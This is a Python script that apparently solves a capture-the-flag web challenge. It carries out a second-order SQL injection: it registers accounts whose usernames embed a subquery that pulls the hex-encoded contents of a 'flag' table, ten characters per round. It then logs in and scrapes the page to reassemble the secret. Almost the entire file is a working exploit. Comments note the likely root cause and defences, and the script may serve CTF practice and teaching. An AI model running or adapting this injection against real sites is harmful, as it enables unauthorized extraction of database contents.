import requests
import re


# Base URL of the challenge host; every path used below is relative to it.
url = "http://111.198.29.45:54295/"
# One shared session so cookies returned by the server persist across requests.
r = requests.session()
# Browser-like request headers. The misspelled name is kept because later
# code refers to it by this exact name.
hearders = dict(
    [
        ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"),
        ("Referer", "http://111.198.29.45:54295/register.php"),
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Host", "111.198.29.45:54295"),
        ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
        ("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"),
        ("Accept-Encoding", "gzip, deflate"),
        ("Upgrade-Insecure-Requests", "1"),
        ("Connection", "close"),
    ]
)
# Captures the text on the line following `name">`, up to the next `<`,
# in the fetched index page.
pattern = re.compile(r'name">\n(.*)<')

def payload(i):
    """Build the registration form fields for round *i*.

    The email is made unique per round so each registration is accepted as a
    new account. The username field carries the injected SQL expression that
    selects a 10-character window of the (double hex-encoded) flag starting at
    offset ``i*10 + 1``; the password is a fixed placeholder.

    Returns a dict with the keys ``email``, ``username`` and ``password``.
    """
    offset = i * 10 + 1
    fields = {}
    fields["email"] = str(i + 10) + "@a.a"
    # Built by concatenation rather than str.format; the resulting text is the same.
    fields["username"] = (
        "0'%2B(select substr(hex(hex((select * from flag))) from "
        + str(offset)
        + " for 10))%2B'0"
    )
    fields["password"] = "sa"
    return fields


# One registration payload per 10-character window of the flag; ten rounds
# therefore cover at most 100 characters of the hex-encoded value.
# Root cause this relies on (inferred, not visible here): the registration
# handler presumably places the username into a SQL statement without
# parameterization and later renders the stored value. Parameterized
# queries plus output encoding would defeat both steps; registration
# requests containing SQL keywords are the detectable signal on the server.
registDict = [payload(i) for i in range(10)]
flag = ""
try:
    for i in range(10):
        r.headers.update(hearders)
        # NOTE(review): PHPSESSID is hard-coded here even though the session
        # object also tracks cookies set by the server; presumably a previously
        # captured session id — confirm it is still the one the target expects.
        t = r.post(url + "register.php", data=registDict[i], headers=hearders,
                   cookies={"PHPSESSID": "l2vegj57h3fvbm5bgrkm3kvcj0"})
        if (t.status_code == 302):  # a successful registration redirects automatically; no redirect means it failed
            r.post(url + "login.php", data={"email": registDict[i]['email'], "password": registDict[i]['password']})
            cont = r.get(url + "index.php")
            # Extract the displayed name field; presumably the stored username,
            # which after evaluation holds the selected flag fragment.
            res = pattern.search(cont.text)
            # NOTE: search() returns None when the pattern is absent; the
            # resulting AttributeError is not a RequestException and would
            # escape the except clause below.
            res = res.group(1).strip()
            flag = flag + res
            print(flag)
        else:
            print("注册失败{}".format(registDict[i]))
# On a transport-level error, print the specific exception.
except requests.RequestException as e:
    print(e)